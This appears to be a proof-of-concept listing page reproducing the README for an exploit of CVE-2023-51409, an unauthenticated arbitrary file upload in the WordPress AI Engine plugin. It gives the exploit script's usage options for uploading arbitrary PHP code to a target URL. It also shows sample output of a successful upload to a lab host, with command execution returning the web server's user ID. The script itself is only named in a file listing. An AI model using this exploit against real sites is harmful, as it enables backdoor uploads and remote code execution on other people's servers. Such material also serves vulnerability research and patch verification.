CVE-2023-51409 PoC — WordPress AI Engine plugin <= 1.9.98 - Unauthenticated Arbitrary File Upload vulnerability

Source

Associated Vulnerability

Readme

# CVE-2023-51409
#### AI Engine: ChatGPT Chatbot <= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload

## Description
This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. 

## usage:
 
```
options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress instance.
  -code PHP_CODE, --php_code PHP_CODE
  PHP code to upload (default, id).
```

### The result

```
[INFO] Initiating version check for target.
[INFO] Target plugin version detected: 1.9.98
[VULNERABLE] Detected vulnerable plugin version. Proceeding with exploitation.
[INFO] Target is vulnerable. Proceeding with file upload.
[INFO] Attempting to upload file: Nxploit.php to endpoint: http://192.168.100.74:888/wordpress/wp-json/mwai-ui/v1/files/upload
[SUCCESS] File uploaded successfully! Accessible at: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
[INFO] Exploitation complete. Uploaded file URL: http://192.168.100.74:888/wordpress/wp-content/uploads/2025/01/Nxploit.php
```


### default php code
```
id 
uid=1(daemon) gid=1(daemon) groups=1(daemon)
```
 

File Snapshot

 [4.0K]  /data/pocs/2f0441ba4923982c443df04f4c9052549c2872ba
├── [5.0K]  CVE-2023-51409.py
└── [1.2K]  README.md

0 directories, 2 files

Remarks